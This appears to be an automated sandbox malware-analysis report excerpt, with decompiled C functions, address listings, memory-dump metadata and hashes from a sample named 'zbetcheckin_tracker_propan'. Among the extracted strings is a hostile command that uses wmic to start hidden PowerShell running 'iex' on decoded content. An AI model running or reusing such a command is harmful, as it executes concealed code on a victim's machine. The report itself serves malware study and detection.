						goto L13;
					}
					_t107 = 0xfffffffe;
					E00411854(_t77, 0xfffffffe, _t111, 0x42c4a0);
				} else {
					_t116 = _t77[3];
					_t107 =  &_v8;
					_v8 = _t58;
					_v4 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v8;
					if(_t116 == 0xfffffffe) {
						L13:
						return _v12;
					} else {
						goto L4;
					}
					do {
						L4:
						_t65 = _t116 + _t116 * 2;
						_t90 =  *((intOrPtr*)(_t114 + 0x14 + _t65 * 4));
						_t77 = _t114 + 0x10 + _t65 * 4;
						_t66 =  *_t77;
						_v16 = _t66;
						if( *((intOrPtr*)(_t114 + 0x14 + _t65 * 4)) == 0) {
							goto L8;
						}
						_t107 = _t111;
						_t126 = E0041180A(_t90, _t111);
						_v17 = 1;
						if(_t126 < 0) {
							_v12 = 0;
							L10:
							_t61 =  *_t114;
							if( *_t114 != 0xfffffffe) {
								E0040FE9A(_t61, _t77,  *((intOrPtr*)(_t114 + 4)) + _t111 ^  *(_t61 + _t111), _t107, _t111, _t114);
							}
							E0040FE9A( *((intOrPtr*)(_t114 + 8)), _t77,  *((intOrPtr*)(_t114 + 0xc)) + _t111 ^  *( *((intOrPtr*)(_t114 + 8)) + _t111), _t107, _t111, _t114);
							goto L13;
						}
						if(_t126 > 0) {
							__eflags =  *_a4 - 0xe06d7363;
							if( *_a4 == 0xe06d7363) {
								__eflags =  *0x436bfc;
								if(__eflags != 0) {
									_push(0x436bfc);
									_t67 = E00411362(_t77, _t111, _t114, __eflags);
									__eflags = _t67;
									if(_t67 != 0) {
										_t107 = _a4;
										_t67 =  *0x436bfc(_a4, 1);
									}
								}
							}
							E0041183A(_t67, _a8);
							_t69 = _a8;
							__eflags = _t69[3] - _t116;
							if(_t69[3] != _t116) {
								_t107 = _t116;
								E00411854(_t69, _t116, _t111, 0x42c4a0);
								_t69 = _v0;
							}
							_t69[3] = _v16;
							_t70 =  *_t114;
							__eflags = _t70 - 0xfffffffe;
							if(_t70 != 0xfffffffe) {
								__eflags =  *((intOrPtr*)(_t114 + 4)) + _t111 ^  *(_t70 + _t111);
								_t70 = E0040FE9A(_t70, _t77,  *((intOrPtr*)(_t114 + 4)) + _t111 ^  *(_t70 + _t111), _t107, _t111, _t114);
							}
							E0040FE9A(_t70, _t77,  *((intOrPtr*)(_t114 + 0xc)) + _t111 ^  *( *((intOrPtr*)(_t114 + 8)) + _t111),  *((intOrPtr*)(_t114 + 8)), _t111, _t114);
							_t97 = _t77[2];
							_t109 = _t111;
							E00413DF9(_t97, _t109, 1);
							goto __esi;
						}
						_t66 = _v16;
						L8:
						_t116 = _t66;
					} while (_t66 != 0xfffffffe);
					if(_v17 == 0) {
						goto L13;
					}
				}
			}

0x0040d4f0
0x0040d4f4
0x0040d4fd
0x0040d504
0x0040d509
0x0040d50e
0x0040d516
0x0040d519
0x0040d523
0x0040d523
0x0040d533
0x0040d538
0x0040d540
0x0040d665
0x0040d669
0x00000000
0x00000000
0x0040d677
0x0040d67c
0x0040d546
0x0040d546
0x0040d550
0x0040d554
0x0040d558
0x0040d55c
0x0040d55f
0x0040d5bf
0x0040d5ca
0x00000000
0x00000000
0x00000000
0x0040d561
0x0040d561
0x0040d561
0x0040d565
0x0040d56b
0x0040d56f
0x0040d571
0x0040d575
0x00000000
0x00000000
0x0040d577
0x0040d57e
0x0040d580
0x0040d585
0x0040d5cb
0x0040d59b
0x0040d59b
0x0040d5a0
0x0040d5aa
0x0040d5aa
0x0040d5ba
0x00000000
0x0040d5ba
0x0040d587
0x0040d5d9
0x0040d5df
0x0040d5e1
0x0040d5e8
0x0040d5ea
0x0040d5ef
0x0040d5f7
0x0040d5f9
0x0040d5fb
0x0040d602
0x0040d608
0x0040d5f9
0x0040d5e8
0x0040d60f
0x0040d614
0x0040d618
0x0040d61b
0x0040d623
0x0040d627
0x0040d62c
0x0040d62c
0x0040d634
0x0040d637
0x0040d639
0x0040d63c
0x0040d643
0x0040d646
0x0040d646
0x0040d656
0x0040d65b
0x0040d65e
0x00411829
0x00411838
0x00411838
0x0040d589
0x0040d58d
0x0040d590
0x0040d590
0x0040d599
0x00000000
0x00000000
0x0040d599

Strings

csm, xrefs: 0040D5D9

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Filter$ExceptionProcessUnhandled$CallCurrentDebuggerFunc@8PresentTerminateUnwind
String ID: csm
API String ID: 4279868475-945121583
Opcode ID: 7f8dbafe797af72c27f8246625a5154135670d5f8700303a741559603f0c89aa
Instruction ID: 7636f90b0f1c14c5d2783b01228ece5142a43747b957611b9dc2045ec2fcdf5b
Opcode Fuzzy Hash: 7f8dbafe797af72c27f8246625a5154135670d5f8700303a741559603f0c89aa
Instruction Fuzzy Hash: C65185306043018FC724DF69C891A6BB7E1AF85328F54897EE856973E2CB39EC49CB55

Function 002D42BD, Relevance: 1.3, Strings: 1, Instructions: 35

Strings

%systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII., xrefs: 002D42CB, 002D42D0, 002D42EA

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$AllocateFree
String ID: %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.
API String ID: 2488874121-4058178351
Opcode ID: ca5157170fa793238ab02b4a3d8840f3cba4ca901d43e7508489ef1228657454
Instruction ID: c5e0ccde82d0a77229a3cd1888a7c619b031f7d61e34add79155ac3488d4d86a
Opcode Fuzzy Hash: ca5157170fa793238ab02b4a3d8840f3cba4ca901d43e7508489ef1228657454
Instruction Fuzzy Hash: A4E0122261253737023175AB5C58EA7EA5C9E567E23550223BD08D3701EB15DC6145F0

Function 0041498B, Relevance: .6, Instructions: 585

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: e3c7bf9c222568088675305754680de23a458daff8bb14792d4bbad8b19d04a0
Instruction ID: be2820b812828461db64683cad85a0873d12b28c68765580b26a87767bbd0006
Opcode Fuzzy Hash: e3c7bf9c222568088675305754680de23a458daff8bb14792d4bbad8b19d04a0
Instruction Fuzzy Hash: 5E227731E442088BDF24CFA8C4503EEBBB2FB99315F65812BD456AB385D77858C6CB49

Function 0041498B, Relevance: .6, Instructions: 585
Crypto

C-Code - Quality: 18%

			E0041498B(signed int __edx, signed int* _a4, signed int _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, intOrPtr* _a32) {
				signed int _v8;
				char _v13;
				char _v36;
				short _v38;
				signed int _v40;
				signed int _v42;
				signed int _v44;
				signed int _v46;
				signed int _v48;
				signed int _v54;
				signed int _v56;
				signed int _v58;
				signed int _v60;
				signed int _v62;
				signed int _v64;
				char _v74;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed short* _v96;
				signed short* _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int* _v128;
				void* __ebx;
				char* __edi;
				signed int __esi;
				signed int _t229;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t238;
				intOrPtr* _t264;
				signed int _t271;
				intOrPtr* _t309;
				signed int _t328;
				signed int _t339;

				_t308 = __edx;
				_t229 =  *0x42c4a0; // 0xe190ffa3
				_v8 = _t229 ^ _t339;
				_t266 = 0;
				_v128 = _a4;
				_t328 = 1;
				_t271 = 0;
				_t343 = _a32;
				_v116 = _a8;
				_t320 =  &_v36;
				_v120 = 0;
				_v108 = 1;
				_v80 = 0;
				_v92 = 0;
				_v96 = 0;
				_v100 = 0;
				_v104 = 0;
				_v84 = 0;
				_v112 = 0;
				if(_a32 != 0) {
					_t309 = _a12;
					_v88 = _t309;
					while(1) {
						_t233 =  *_t309;
						__eflags = _t233 - 0x20;
						if(_t233 == 0x20) {
							goto L7;
						}
						__eflags = _t233 - 9;
						if(_t233 == 9) {
							goto L7;
						}
						__eflags = _t233 - 0xa;
						if(_t233 == 0xa) {
							goto L7;
						}
						__eflags = _t233 - 0xd;
						if(_t233 != 0xd) {
							_t266 = 0x30;
							while(1) {
								L9:
								_t234 =  *_t309;
								_t309 = _t309 + 1;
								__eflags = _t271 - 0xb;
								if(_t271 > 0xb) {
									break;
								}
								switch( *((intOrPtr*)(_t271 * 4 +  &M0041501F))) {
									case 0:
										__eflags = _t234 - 0x31 - 8;
										if(_t234 - 0x31 > 8) {
											_t305 =  *_a32;
											__eflags = _t234 -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t305 + 0xbc))))));
											if(_t234 !=  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t305 + 0xbc))))))) {
												_t260 = _t234 - 0x2b;
												__eflags = _t260;
												if(_t260 == 0) {
													_v120 = _v120 & 0x00000000;
													_push(2);
													_pop(_t271);
													goto L9;
												}
												_t262 = _t260;
												__eflags = _t262;
												if(_t262 == 0) {
													_push(2);
													_pop(_t271);
													_v120 = 0x8000;
													goto L9;
												}
												__eflags = _t262 != 3;
												if(_t262 != 3) {
													goto L76;
												}
												goto L20;
											}
											goto L15;
										}
										goto L12;
									case 1:
										__eflags = __al - 0x31 - 8;
										_v92 = __esi;
										if(__al - 0x31 <= 8) {
											goto L12;
										}
										_a32 =  *_a32;
										__ecx =  *( *_a32 + 0xbc);
										__ecx =  *( *( *_a32 + 0xbc));
										__eflags = __al -  *__ecx;
										if(__al !=  *__ecx) {
											__eflags = __al - 0x2b;
											if(__al == 0x2b) {
												goto L34;
											}
											__eflags = __al - 0x2d;
											if(__al == 0x2d) {
												goto L34;
											}
											__eflags = __al - __bl;
											if(__al == __bl) {
												goto L20;
											}
											goto L29;
										}
										goto L25;
									case 2:
										__eflags = __al - 0x31 - 8;
										if(__al - 0x31 <= 8) {
											L12:
											_push(3);
											goto L13;
										}
										_a32 =  *_a32;
										__ecx =  *( *_a32 + 0xbc);
										__ecx =  *( *( *_a32 + 0xbc));
										__eflags = __al -  *__ecx;
										if(__al ==  *__ecx) {
											L15:
											_push(5);
											goto L16;
										}
										__eflags = __al - __bl;
										if(__al == __bl) {
											L20:
											_t271 = _t328;
											goto L9;
										}
										goto L38;
									case 3:
										_v92 = __esi;
										while(1) {
											__eflags = __al - __bl;
											if(__al < __bl) {
												break;
											}
											__eflags = __al - 0x39;
											if(__al > 0x39) {
												break;
											}
											__eflags = _v80 - 0x19;
											if(_v80 >= 0x19) {
												_t36 =  &_v84;
												 *_t36 = _v84 + 1;
												__eflags =  *_t36;
											} else {
												_v80 = _v80 + 1;
												 *__edi = __al;
												__edi = __edi + 1;
											}
											__al =  *__edx;
											__edx = __edx + 1;
											__eflags = __edx;
										}
										_a32 =  *_a32;
										__ecx =  *( *_a32 + 0xbc);
										__ecx =  *( *( *_a32 + 0xbc));
										__eflags = __al -  *__ecx;
										if(__al ==  *__ecx) {
											L25:
											_push(4);
											goto L16;
										}
										goto L47;
									case 4:
										__eflags = _v80;
										_v92 = __esi;
										_v96 = __esi;
										if(_v80 != 0) {
											while(1) {
												L59:
												__eflags = __al - __bl;
												if(__al < __bl) {
													break;
												}
												__eflags = __al - 0x39;
												if(__al > 0x39) {
													L47:
													__eflags = __al - 0x2b;
													if(__al == 0x2b) {
														L34:
														__edx = __edx - 1;
														_push(0xb);
														goto L16;
													}
													__eflags = __al - 0x2d;
													if(__al == 0x2d) {
														goto L34;
													}
													L29:
													__eflags = __al - 0x43;
													if(__al <= 0x43) {
														goto L76;
													}
													__eflags = __al - 0x45;
													if(__al <= 0x45) {
														L33:
														_push(6);
														goto L16;
													}
													__eflags = __al - 0x63;
													if(__al <= 0x63) {
														goto L76;
													}
													__eflags = __al - 0x65;
													if(__al > 0x65) {
														goto L76;
													}
													goto L33;
												}
												__eflags = _v80 - 0x19;
												if(_v80 < 0x19) {
													_v80 = _v80 + 1;
													 *__edi = __al;
													__edi = __edi + 1;
													_t48 =  &_v84;
													 *_t48 = _v84 - 1;
													__eflags =  *_t48;
												}
												__al =  *__edx;
												__edx = __edx + 1;
												__eflags = __edx;
											}
											goto L47;
										}
										while(1) {
											__eflags = __al - __bl;
											if(__al != __bl) {
												break;
											}
											_v84 = _v84 - 1;
											__al =  *__edx;
											__edx = __edx + 1;
											__eflags = __edx;
										}
										goto L59;
									case 5:
										__al = __al - __bl;
										__eflags = __al - 9;
										_v96 = __esi;
										if(__al > 9) {
											goto L38;
										}
										_push(4);
										goto L13;
									case 6:
										__ecx = __edx - 2;
										_v88 = __ecx;
										__eflags = __al - 0x31 - 8;
										if(__al - 0x31 > 8) {
											__eax = __al;
											__eax = __al - 0x2b;
											__eflags = __eax;
											if(__eax == 0) {
												goto L71;
											}
											__eax = __eax - 1;
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												goto L70;
											}
											__eax = __eax - 3;
											__eflags = __eax;
											goto L68;
										}
										goto L64;
									case 7:
										__eflags = __al - 0x31 - 8;
										if(__al - 0x31 <= 8) {
											goto L64;
										}
										__eflags = __al - __bl;
										L68:
										if(__eflags != 0) {
											L38:
											__edx = _v88;
											goto L83;
										}
										_push(8);
										goto L16;
									case 8:
										_v100 = __esi;
										while(1) {
											__eflags = __al - __bl;
											if(__al != __bl) {
												break;
											}
											__al =  *__edx;
											__edx = __edx + 1;
											__eflags = __edx;
										}
										__al = __al - 0x31;
										__eflags = __al - 8;
										if(__al <= 8) {
											L64:
											_push(9);
											L13:
											_pop(_t271);
											_t309 = _t309 - 1;
											goto L9;
										}
										goto L76;
									case 9:
										_v100 = __esi;
										__ecx = 0;
										while(1) {
											__eflags = __al - __bl;
											if(__al < __bl) {
												break;
											}
											__eflags = __al - 0x39;
											if(__al > 0x39) {
												L100:
												_v104 = __ecx;
												while(1) {
													__eflags = __al - __bl;
													if(__al < __bl) {
														break;
													}
													__eflags = __al - 0x39;
													if(__al > 0x39) {
														L76:
														_t309 = _t309 - 1;
														goto L83;
													}
													__al =  *__edx;
													__edx = __edx + 1;
													__eflags = __edx;
												}
												goto L76;
											}
											__ecx = __ecx * 0xa;
											__esi = __al;
											__ecx = __ecx + __esi - 0x30;
											__eflags = __ecx - 0x1450;
											if(__ecx > 0x1450) {
												__ecx = 0x1451;
												goto L100;
											}
											__al =  *__edx;
											__edx = __edx + 1;
											__eflags = __edx;
										}
										goto L100;
									case 0xa:
										goto L91;
									case 0xb:
										__eflags = _a28;
										if(_a28 == 0) {
											_push(0xa);
											_pop(__ecx);
											__edx = __edx - 1;
											__eflags = __edx;
											goto L91;
										}
										__eax = __al;
										__eax = __al - 0x2b;
										__eflags = __eax;
										__ecx = __edx - 1;
										_v88 = __ecx;
										if(__eax == 0) {
											L71:
											_push(7);
											L16:
											_pop(_t271);
											goto L9;
										}
										__eax = __eax - 1;
										__eax = __eax - 1;
										__eflags = __eax;
										if(__eax == 0) {
											L70:
											_v108 = _v108 | 0xffffffff;
											_push(7);
											_pop(__ecx);
											goto L9;
										}
										__edx = __ecx;
										L83:
										__eflags = _v92;
										 *_v116 = _t309;
										if(_v92 == 0) {
											_v112 = 4;
											L179:
											_t272 = 0;
											_t236 = 0;
											_t308 = 0;
											_t328 = 0;
											__eflags = 0;
											L180:
											_t320 = _v128;
											_t237 = _t236 | _v120;
											__eflags = _t237;
											 *_t320 = _t272;
											_t320[2] = _t237;
											_t238 = _v112;
											_t320[0] = _t328;
											_t320[1] = _t308;
											goto L181;
										}
										_push(0x18);
										_pop(_t240);
										__eflags = _v80 - _t240;
										if(_v80 > _t240) {
											__eflags = _v13 - 5;
											if(_v13 >= 5) {
												_t63 =  &_v13;
												 *_t63 = _v13 + 1;
												__eflags =  *_t63;
											}
											_t320 = _t320 - 1;
											_t65 =  &_v84;
											 *_t65 = _v84 + 1;
											__eflags =  *_t65;
											_v80 = _t240;
										}
										__eflags = _v80;
										if(_v80 <= 0) {
											goto L179;
										} else {
											while(1) {
												_t320 = _t320 - 1;
												__eflags =  *_t320;
												if( *_t320 != 0) {
													break;
												}
												_v80 = _v80 - 1;
												_t75 =  &_v84;
												 *_t75 = _v84 + 1;
												__eflags =  *_t75;
											}
											E004160BE( &_v36, _v80,  &_v64);
											_t244 = _v104;
											__eflags = _v108;
											if(_v108 < 0) {
												_t244 =  ~_t244;
											}
											_t245 = _t244 + _v84;
											__eflags = _v100;
											if(_v100 == 0) {
												_t245 = _t245 + _a20;
												__eflags = _t245;
											}
											__eflags = _v96;
											if(_v96 == 0) {
												_t245 = _t245 - _a24;
												__eflags = _t245;
											}
											__eflags = _t245 - 0x1450;
											if(_t245 > 0x1450) {
												_t328 = 0;
												_t236 = 0x7fff;
												_t308 = 0x80000000;
												_t272 = 0;
												_v112 = 2;
												goto L180;
											} else {
												__eflags = _t245 - 0xffffebb0;
												if(_t245 < 0xffffebb0) {
													_v112 = 1;
													goto L179;
												}
												_t330 = 0x42ccd0;
												__eflags = _t245;
												_v88 = _t245;
												if(__eflags == 0) {
													L175:
													_t272 = _v64 & 0x0000ffff;
													_t328 = _v62;
													_t308 = _v58;
													_t236 = _v56 >> 0x10;
													goto L180;
												}
												if(__eflags < 0) {
													_v88 =  ~_t245;
													_t330 = 0x42ce30;
													__eflags = 0x42ce90;
												}
												__eflags = _a16;
												if(_a16 == 0) {
													_v64 = 0;
												}
												__eflags = _v88;
												if(_v88 != 0) {
													do {
														_v88 = _v88 >> 3;
														_t330 = _t330 + 0x54;
														_t248 = _v88 & 0x00000007;
														__eflags = _t248;
														_v80 = _t330;
														if(_t248 == 0) {
															goto L174;
														}
														_t266 = _t248 * 0xc + _t330;
														__eflags =  *_t266 - 0x8000;
														_v116 = _t266;
														if( *_t266 >= 0x8000) {
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t98 =  &_v74;
															 *_t98 = _v74 - 1;
															__eflags =  *_t98;
															_t330 = _v80;
															_t266 =  &_v76;
															_v116 = _t266;
														}
														_t310 =  *(_t266 + 0xa) & 0x0000ffff;
														_t276 = _v54;
														_v84 = 0;
														_v48 = 0;
														_v44 = 0;
														_v40 = 0;
														_t277 = _t276 & 0x00007fff;
														_t311 = _t310 & 0x00007fff;
														_t254 = (_t310 ^ _t276) & 0x00008000;
														__eflags = _t277 - 0x7fff;
														_t323 = _t311 + _t277 & 0x0000ffff;
														if(_t277 >= 0x7fff) {
															L172:
															asm("sbb eax, eax");
															_v60 = _v60 & 0x00000000;
															_t257 = ( ~_t254 & 0x80000000) + 0x7fff8000;
															_t211 =  &_v64;
															 *_t211 = _v64 & 0x00000000;
															__eflags =  *_t211;
															goto L173;
														} else {
															__eflags = _t311 - 0x7fff;
															if(_t311 >= 0x7fff) {
																goto L172;
															}
															__eflags = _t323 - 0xbffd;
															if(_t323 > 0xbffd) {
																goto L172;
															}
															__eflags = _t323 - 0x3fbf;
															if(_t323 > 0x3fbf) {
																__eflags = _t277;
																if(_t277 != 0) {
																	L134:
																	__eflags = _t311;
																	if(_t311 != 0) {
																		L139:
																		_t126 =  &_v108;
																		 *_t126 = _v108 & 0;
																		__eflags =  *_t126;
																		_t331 =  &_v44;
																		_v92 = 5;
																		do {
																			_t312 = _v92;
																			_t280 = _v108 + _v108;
																			__eflags = _t312;
																			_v104 = _t312;
																			if(_t312 <= 0) {
																				goto L149;
																			}
																			_t267 = _t266 + 8;
																			__eflags = _t267;
																			_v96 = _t339 + _t280 - 0x3c;
																			_v100 = _t267;
																			do {
																				_v124 = _v124 & 0x00000000;
																				_t301 = ( *_v100 & 0x0000ffff) * ( *_v96 & 0x0000ffff);
																				_t319 =  *((intOrPtr*)(_t331 - 4));
																				_t268 = _t319 + _t301;
																				__eflags = _t268 - _t319;
																				if(_t268 < _t319) {
																					L144:
																					_v124 = 1;
																					goto L145;
																				}
																				__eflags = _t268 - _t301;
																				if(_t268 >= _t301) {
																					goto L145;
																				}
																				goto L144;
																				L145:
																				__eflags = _v124;
																				 *((intOrPtr*)(_t331 - 4)) = _t268;
																				if(_v124 != 0) {
																					 *_t331 =  *_t331 + 1;
																					__eflags =  *_t331;
																				}
																				_v96 = _v96 + 2;
																				_v100 = _v100 - 2;
																				_v104 = _v104 - 1;
																				__eflags = _v104;
																			} while (_v104 > 0);
																			_t266 = _v116;
																			L149:
																			_t331 =  &(_t331[0]);
																			_v108 = _v108 + 1;
																			_v92 = _v92 - 1;
																			__eflags = _v92;
																		} while (_v92 > 0);
																		_t325 = _t323 + 0xc002;
																		__eflags = _t325;
																		if(_t325 <= 0) {
																			L154:
																			_t325 = _t325 + 0xffff;
																			__eflags = _t325;
																			if(_t325 >= 0) {
																				L161:
																				__eflags = _v48 - 0x8000;
																				if(_v48 > 0x8000) {
																					L163:
																					__eflags = _v46 - 0xffffffff;
																					if(_v46 != 0xffffffff) {
																						_t199 =  &_v46;
																						 *_t199 = _v46 + 1;
																						__eflags =  *_t199;
																					} else {
																						_v46 = _v46 & 0x00000000;
																						__eflags = _v42 - 0xffffffff;
																						if(_v42 != 0xffffffff) {
																							_v42 = _v42 + 1;
																						} else {
																							_v42 = _v42 & 0x00000000;
																							__eflags = _v38 - 0xffff;
																							if(_v38 != 0xffff) {
																								_v38 = _v38 + 1;
																							} else {
																								_v38 = 0x8000;
																								_t325 = _t325 + 1;
																							}
																						}
																					}
																					L170:
																					__eflags = _t325 - 0x7fff;
																					_t330 = _v80;
																					if(_t325 >= 0x7fff) {
																						goto L172;
																					}
																					_v64 = _v46;
																					_v62 = _v44;
																					_v58 = _v40;
																					_v54 = _t325 | _t254;
																					goto L174;
																				}
																				__eflags = (_v48 & 0x0001ffff) - 0x18000;
																				if((_v48 & 0x0001ffff) != 0x18000) {
																					goto L170;
																				}
																				goto L163;
																			}
																			_t333 =  ~_t325 & 0x0000ffff;
																			_t325 = _t325 + _t333;
																			__eflags = _t325;
																			do {
																				__eflags = _v48 & 0x00000001;
																				if((_v48 & 0x00000001) != 0) {
																					_t172 =  &_v84;
																					 *_t172 = _v84 + 1;
																					__eflags =  *_t172;
																				}
																				_v40 = _v40 >> 1;
																				_t266 = _v44 >> 0x00000001 | _v40 << 0x0000001f;
																				_t333 = _t333 - 1;
																				__eflags = _t333;
																				_v44 = _v44 >> 0x00000001 | _v40 << 0x0000001f;
																				_v48 = _v48 >> 0x00000001 | _v44 << 0x0000001f;
																			} while (_t333 != 0);
																			__eflags = _v84;
																			if(_v84 != 0) {
																				_t183 =  &_v48;
																				 *_t183 = _v48 | 0x00000001;
																				__eflags =  *_t183;
																			}
																			goto L161;
																		} else {
																			goto L151;
																		}
																		while(1) {
																			L151:
																			__eflags = _v40 & 0x80000000;
																			if((_v40 & 0x80000000) != 0) {
																				break;
																			}
																			_t334 = _v44;
																			_v48 = _v48 << 1;
																			_t325 = _t325 + 0xffff;
																			__eflags = _t325;
																			_v44 = _t334 + _t334 | _v48 >> 0x0000001f;
																			_v40 = _v40 + _v40 | _t334 >> 0x0000001f;
																			if(_t325 > 0) {
																				continue;
																			}
																			break;
																		}
																		__eflags = _t325;
																		if(_t325 > 0) {
																			goto L161;
																		}
																		goto L154;
																	}
																	_t323 = _t323 + 1;
																	__eflags =  *(_t266 + 8) & 0x7fffffff;
																	if(( *(_t266 + 8) & 0x7fffffff) != 0) {
																		goto L139;
																	}
																	__eflags =  *(_t266 + 4);
																	if( *(_t266 + 4) != 0) {
																		goto L139;
																	}
																	__eflags =  *_t266;
																	if( *_t266 != 0) {
																		goto L139;
																	}
																	_v56 = 0;
																	_v60 = 0;
																	_v64 = 0;
																	goto L174;
																}
																_t323 = _t323 + 1;
																__eflags = _v56 & 0x7fffffff;
																if((_v56 & 0x7fffffff) != 0) {
																	goto L134;
																}
																__eflags = _v60;
																if(_v60 != 0) {
																	goto L134;
																}
																__eflags = _v64;
																if(_v64 != 0) {
																	goto L134;
																}
																_v54 = _v54 & _t277;
																goto L174;
															}
															_t257 = 0;
															_v60 = 0;
															_v64 = 0;
															L173:
															_v56 = _t257;
														}
														L174:
														__eflags = _v88;
													} while (_v88 != 0);
												}
												goto L175;
											}
										}
								}
							}
							L91:
							__eflags = _t271 - 0xa;
							if(_t271 != 0xa) {
								goto L9;
							}
							goto L83;
						}
						L7:
						_t309 = _t309 + 1;
					}
				} else {
					_t264 = E0040D198(_t343);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t264 = 0x16;
					E0040CB22(0, __edx,  &_v36);
					_t238 = 0;
					L181:
					return E0040FE9A(_t238, _t266, _v8 ^ _t339, _t308, _t320, _t328);
				}
			}

0x0041498b
0x00414991
0x00414998
0x0041499f
0x004149a4
0x004149aa
0x004149ab
0x004149ad
0x004149b1
0x004149b4
0x004149b7
0x004149ba
0x004149bd
0x004149c0
0x004149c3
0x004149c6
0x004149c9
0x004149cc
0x004149cf
0x004149d2
0x004149f3
0x004149f6
0x004149f9
0x004149f9
0x004149fb
0x004149fd
0x00000000
0x00000000
0x004149ff
0x00414a01
0x00000000
0x00000000
0x00414a03
0x00414a05
0x00000000
0x00000000
0x00414a07
0x00414a09
0x00414a0e
0x00414a10
0x00414a10
0x00414a10
0x00414a12
0x00414a13
0x00414a16
0x00000000
0x00000000
0x00414a1c
0x00000000
0x00414a28
0x00414a2b
0x00414a36
0x00414a40
0x00414a42
0x00414a4c
0x00414a4c
0x00414a4f
0x00414a6e
0x00414a72
0x00414a74
0x00000000
0x00414a74
0x00414a52
0x00414a52
0x00414a53
0x00414a62
0x00414a64
0x00414a65
0x00000000
0x00414a65
0x00414a55
0x00414a58
0x00000000
0x00000000
0x00000000
0x00414a58
0x00000000
0x00414a42
0x00000000
0x00000000
0x00414a7c
0x00414a7f
0x00414a82
0x00000000
0x00000000
0x00414a87
0x00414a89
0x00414a8f
0x00414a91
0x00414a93
0x00414a99
0x00414a9b
0x00000000
0x00000000
0x00414a9d
0x00414a9f
0x00000000
0x00000000
0x00414aa1
0x00414aa3
0x00000000
0x00000000
0x00000000
0x00414aa3
0x00000000
0x00000000
0x00414ad2
0x00414ad5
0x00414a2d
0x00414a2d
0x00000000
0x00414a2d
0x00414ade
0x00414ae0
0x00414ae6
0x00414ae8
0x00414aea
0x00414a44
0x00414a44
0x00000000
0x00414a44
0x00414af0
0x00414af2
0x00414a5e
0x00414a5e
0x00000000
0x00414a5e
0x00000000
0x00000000
0x00414b00
0x00414b1f
0x00414b1f
0x00414b21
0x00000000
0x00000000
0x00414b05
0x00414b07
0x00000000
0x00000000
0x00414b09
0x00414b0d
0x00414b19
0x00414b19
0x00414b19
0x00414b0f
0x00414b0f
0x00414b14
0x00414b16
0x00414b16
0x00414b1c
0x00414b1e
0x00414b1e
0x00414b1e
0x00414b26
0x00414b28
0x00414b2e
0x00414b30
0x00414b32
0x00414a95
0x00414a95
0x00000000
0x00414a95
0x00000000
0x00000000
0x00414b45
0x00414b49
0x00414b4c
0x00414b4f
0x00414b77
0x00414b77
0x00414b77
0x00414b79
0x00000000
0x00000000
0x00414b5f
0x00414b61
0x00414b38
0x00414b38
0x00414b3a
0x00414ac5
0x00414ac5
0x00414ac6
0x00000000
0x00414ac6
0x00414b3c
0x00414b3e
0x00000000
0x00000000
0x00414aa5
0x00414aa5
0x00414aa7
0x00000000
0x00000000
0x00414aad
0x00414aaf
0x00414ac1
0x00414ac1
0x00000000
0x00414ac1
0x00414ab1
0x00414ab3
0x00000000
0x00000000
0x00414ab9
0x00414abb
0x00000000
0x00000000
0x00000000
0x00414abb
0x00414b63
0x00414b67
0x00414b69
0x00414b6e
0x00414b70
0x00414b71
0x00414b71
0x00414b71
0x00414b71
0x00414b74
0x00414b76
0x00414b76
0x00414b76
0x00000000
0x00414b7b
0x00414b59
0x00414b59
0x00414b5b
0x00000000
0x00000000
0x00414b53
0x00414b56
0x00414b58
0x00414b58
0x00414b58
0x00000000
0x00000000
0x00414b7d
0x00414b7f
0x00414b81
0x00414b84
0x00000000
0x00000000
0x00414b8a
0x00000000
0x00000000
0x00414b91
0x00414b94
0x00414b9c
0x00414b9f
0x00414ba8
0x00414bab
0x00414bab
0x00414bae
0x00000000
0x00000000
0x00414bb0
0x00414bb1
0x00414bb1
0x00414bb2
0x00000000
0x00000000
0x00414bb4
0x00414bb4
0x00000000
0x00414bb4
0x00000000
0x00000000
0x00414bf1
0x00414bf4
0x00000000
0x00000000
0x00414bf6
0x00414bb7
0x00414bb7
0x00414af8
0x00414af8
0x00000000
0x00414af8
0x00414bbd
0x00000000
0x00000000
0x00414bd7
0x00414bdf
0x00414bdf
0x00414be1
0x00000000
0x00000000
0x00414bdc
0x00414bde
0x00414bde
0x00414bde
0x00414be3
0x00414be5
0x00414be7
0x00414ba1
0x00414ba1
0x00414a2f
0x00414a2f
0x00414a30
0x00000000
0x00414a30
0x00000000
0x00000000
0x00414c56
0x00414c59
0x00414c76
0x00414c76
